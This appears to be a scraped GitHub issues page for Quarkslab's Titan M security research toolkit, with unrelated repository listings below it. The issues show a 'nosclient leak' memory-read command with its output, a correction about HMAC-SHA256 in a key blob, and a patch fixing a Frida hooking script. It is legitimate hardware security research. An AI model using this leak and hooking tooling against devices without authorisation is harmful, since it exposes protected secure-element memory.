    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20                                                                                                                          
    67 53 b7 a2 53 55 9b 8c bf b8 f2 66 e5 75 05 a8 7a 49 b4 73 cf 73 8f 07 41 c7 61 56 78 2b 79 03 
    blueline:/data/local/tmp # ./nosclient leak 0x17a60 20                                                                                                                              
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    ==========================
    

    Is there any explanation of why this happens? Attempt to access to the locked memory addresses used by other activities?

    opened by NewDwarf 2
  • Typo/inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    Typo/inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    The EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper has possible typo or inaccuracy in 'Key Blob structure' description, p. 49. The paper claims that last 32 bytes of the key blob starting from 0x5e0 offset is the SHA256 digest. But it is not so. It is HMAC-SHA256. I think it doesn't make sense to use just SHA256 there as just a hash doesn't guarantee the authenticity. But HMAC does.

    opened by NewDwarf 1
  • Frida callapp.js script doesn't work

    Frida callapp.js script doesn't work

    The frida script 'callapp.js' has several issues. I guess, the code base was slightly modified after original creating of the frida script. Below is the patch:

    $ git diff callapp.js
    diff --git a/nugget_toolkit/scripts/frida/callapp.js b/nugget_toolkit/scripts/frida/callapp.js
    index c75fc10..333f222 100644
    --- a/nugget_toolkit/scripts/frida/callapp.js
    +++ b/nugget_toolkit/scripts/frida/callapp.js
    @@ -14,7 +14,7 @@ var app_id, param;
     var request, request_size;
     var reply, reply_size_addr, reply_size;
     
    -var libname = "parser.so";
    +var libname = "libparser.so";
     var libdir = "/data/local/tmp/";
     var libpath = libdir + libname;
     
    @@ -25,7 +25,7 @@ log("Found sanity function at: " + sanity_func);
     var sanity_res = sanity_func();
     log("Sanity function returned " + sanity_res);
     
    -var parser_func = new NativeFunction(Module.findExportByName(libname, "_Z6parserjjPcjS_Pj"), "void", ["int", "int", "pointer", "int", "pointer", "pointer"]);
    +var parser_func = new NativeFunction(Module.findExportByName(libname, "parser"), "void", ["int", "int", "pointer", "int", "pointer", "int"]);
     
     Interceptor.attach(moduleBase, {
         onEnter: function(args) {
    @@ -63,8 +63,8 @@ Interceptor.attach(moduleBase, {
                 log("Reply has null size");
             }
     
    -        parser_func(app_id, param, request, request_size, reply, reply_size_addr);
    +        parser_func(app_id, param, request, request_size, reply, reply_size);
     
             log("------------------------------------------------------------------------------------------------------");
         }
    -});
    \ No newline at end of file
    +});
    
    opened by NewDwarf 1
Owner
Quarkslab
Quarkslab
Learn how to connect your Flexispot (LoctekMotion) desk to the internet. This repository contains a collection of scripts to get your started, combined with research and instructions.

(image source: Windows Central) Turn your LoctekMotion/FlexiSpot desk into a smart desk Recently I acquired a new standing desk from FlexiSpot. During

Mick Vleeshouwer 195 Nov 17, 2022
This is our take on the digitalisation of the board game "b00le0", where you can play versus our AI, or against one of your friends in an online match.

This is our take on the digitalisation of the board game "b00le0", where you can play versus our AI, or against one of your friends in an online match.

valko purzalko 22 Nov 16, 2022
Tiny FEL tools for allwinner SOC, support RISC-V D1 chip

XFEL Tiny FEL tools for allwinner SOC, support RISC-V D1 chip. How to build The xfel tools depends on the libusb-1.0 library, you need to install libu

xboot.org 123 Nov 11, 2022
This repo contains source code of our paper presented in IROS2021 "Single-Shot is Enough: Panoramic Infrastructure Based Calibration of Multiple Cameras and 3D LiDARs"

Single-Shot is Enough: Panoramic Infrastructure Based Calibration of Multiple Cameras and 3D LiDARs Updates [2021/09/01] first commit, source code of

Alibaba 72 Nov 17, 2022
Doom port for InfOS - the University of Edinburgh Informatics research operating system used in the UG3 OS course

Doom on InfOS InfOS is the Informatics research operating system, designed specifically for the UG3 Operating Systems course. This project aims to por

Cheng Kai 14 Aug 20, 2022
Research tool able to detect and mitigate evasion techniques used by malware in-the-wild

JuanLesPIN IntelPin tool to detect and mitigate Windows malware evasion techniques. This tool is a prototype developed for a research project whose pa

Lorenzo Maffia 7 May 20, 2022
Repository for the taproot-based rewrite of our 2021 development platform

taproot-mdev2021 This is a blank project fully configured for use of Taproot. It is designed to be a starting point for your own RoboMaster software p

TAMU Robomasters 28 Sep 26, 2022
A repository containing our learnings and implementations for the project "Anchor: The Docker Clone" under IEEE-NITK

Anchor: The Docker Clone A repository containing our learnings and implementations for the project "Anchor: The Docker Clone" under IEEE-NITK Currentl

Rakshita Varadarajan 1 Feb 7, 2022
Suckless-tools - My fork of suckless tools.

suckless-tools Here is my fork of suckless tools. I didn't include tabbed, i was using but not actively. I am using xfce4-terminal instead of st. Beca

null 2 Jan 7, 2022
The Vulkan Profiles Tools are a collection of tools delivered with the Vulkan SDK for Vulkan application developers to leverage Vulkan Profiles while developing a Vulkan application

Copyright © 2021-2022 LunarG, Inc. Vulkan Profiles Tools (BETA) The Vulkan Profiles Tools are a collection of tools delivered with the Vulkan SDK for

The Khronos Group 70 Nov 17, 2022
Contains firmware and software used for the bead sprite printer v2 robotic system

Bead-Sprite-Printer-V2 Contains firmware and software used for the bead sprite printer v2 robotic system bead_fuser_arduino - this folder contains the

null 3 Jun 23, 2022
Firmware for DMR transceivers using the NXP MK22 MCU, AT1846S RF chip and HR-C6000 DMR chipset. Including the Radioddiy GD-77, Baofeng DM-1801 and Baofeng RD-5R.

OpenGD77 Firmware for DMR transceivers using the NXP MK22 MCU, AT1846S RF chip and HR-C6000 DMR chipset. This includes the Radioddiy GD-77, Radioddity

Open Ham 101 Nov 19, 2022
EMUCHIP8, a CHIP-8 emulator.

EMUCHIP8 Chip-8 Demo Video This is a fun retro emulator project of mine. You can download the source code and build with MAKE, then insert your chip-8

Levent Kaya 13 Dec 29, 2021
CHIP-8 interpreter in C11

shoganai | しょうがない It means accepting what happens beyond our control and cannot be avoided. It is used to encourage people to move forward without bei

Gioele 2 Sep 28, 2021
A simple CHIP-8 emulator made for the purpose of studying computer organization, mainly how emulation does work.

CHIP8EMU A simple CHIP-8 emulator made for the purpose of studying computer organization, mainly how emulation does work. It was written in just a few

Patrick Cardoso 1 Nov 9, 2021
Lo-Fi SAMD21 based mini chip tune synthesizer - Seeed Studio - Seeeduino XIAO arduino project

samd21_mini_synth Lo-Fi SAMD21 based mini chip tune synthesizer Seeed Studio - Seeeduino XIAO arduino project link to the video Description This time

Marcel 7 Sep 23, 2022
Simple emulator for the extremely popular Chip-8 Virtual Machine.

C8_Emulator [System Structure Reference] #@@@@@@@@@@@. @@@@@@@@@@@@@@@@,

Digvijay Singh Shekhawat 1 Nov 6, 2021
CHIP-8 Emulator using C and SDL2

CHIP-WALO Intro CHIP-8 is an interpreted programming language which was initially used in the late 1970s. It was made to allow more easily programed g

Diamond Rivero 8 Nov 1, 2022